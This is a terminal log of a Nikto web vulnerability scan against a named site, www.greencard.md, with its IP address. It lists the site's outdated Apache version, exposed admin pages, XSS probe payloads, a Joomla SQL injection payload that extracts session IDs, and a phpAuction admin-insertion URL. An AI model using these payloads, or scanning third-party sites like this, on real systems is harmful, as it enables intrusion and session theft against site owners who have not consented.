~/decrypted_private/nikto/program (master) $pi@wwwXyZ ~/decrypted_private/nikt

1. ~/decrypted_private/nikto/program (master) $
2. pi@wwwXyZ ~/decrypted_private/nikto/program (master) $ perl nikto.pl -host http://www.greencard.md
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP: 138.201.190.89
6. + Target Hostname: www.greencard.md
7. + Target Port: 80
8. + Start Time: 2019-05-10 17:42:37 (GMT3)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.4.18
11. + Cookie PHPSESSID created without the httponly flag
12. + The anti-clickjacking X-Frame-Options header is not present.
13. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
14. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
15. + "robots.txt" contains 1 entry which should be manually viewed.
16. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.34). Apache 2.2.34 is the EOL for the 2.x branch.
17. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
18. + /./: Appending '/./' to a directory allows indexing
19. + //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
20. + OSVDB-122: /: Fasttrack can give a directory listing if issued 'get' instead of 'GET'
21. + /: Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher.
22. + OSVDB-576: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.
23. + /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
24. + OSVDB-50553: /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
25. + OSVDB-50553: /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
26. + OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
27. + /config.php: PHP Config file may contain database IDs and passwords.
28. + OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
29. + OSVDB-25497: /index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
30. + OSVDB-12606: /index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
31. + OSVDB-119: /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
32. + OSVDB-119: /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
33. + OSVDB-2790: /index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
34. + OSVDB-3092: /admin/: This might be interesting...
35. + OSVDB-3092: /manual/: Web server manual found.
36. + OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
37. + OSVDB-3233: /icons/README: Apache default file found.
38. + /admin/home.php: Admin login page/section found.
39. + /admin/login.php: Admin login page/section found.
40. + /ur-admin.html: Admin login page/section found.
41. + /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
42. + OSVDB-81817: /?q[]=x: Drupal 7 contains a path information disclosure
43. + /server-status: Apache server-status interface found (protected/forbidden)
44. + /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a): Joomla is vulnerable to a SQL injection which can lead to administrator access. https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0
45. + /index.php: Piwik Analytics login found.
46. + 8846 requests: 0 error(s) and 35 item(s) reported on remote host
47. + End Time: 2019-05-10 17:54:17 (GMT3) (700 seconds)
48. ---------------------------------------------------------------------------
49. + 1 host(s) tested
50. pi@wwwXyZ ~/decrypted_private/nikto/program (master) $ packet_write_wait: Connection to 80.245.88.57 port 22: Broken pipe
51. $